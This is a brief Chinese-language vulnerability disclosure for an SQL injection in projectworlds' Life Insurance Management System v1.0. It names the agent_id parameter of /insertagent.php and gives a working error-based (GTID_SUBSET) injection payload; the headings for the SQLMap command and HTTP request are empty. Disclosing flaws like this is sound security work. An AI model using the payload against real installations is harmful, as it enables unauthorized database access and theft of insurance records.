关键信息 漏洞描述 漏洞类型: SQL注入漏洞 受影响系统: Life Insurance Management System v1.0 受影响文件: /insertagent.php 参数: agent_id 厂商信息 厂商: projectworlds 软件链接: Life Insurance Management System in PHP 版本 版本: V1.0 POC (概念验证) SQLMap命令: HTTP请求示例: 参数详情: - 参数: agent_id (POST) - 类型: 错误基于、时间基于盲注 - 标题: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) - 负载: agent_id=1' AND GTID_SUBSET(CONCAT(0x7162716b71,(SELECT (ELT(3526=3526,1))),0x716a7a71),1)-- TwxH&agent_password=1&name=1&branch=1&phone=1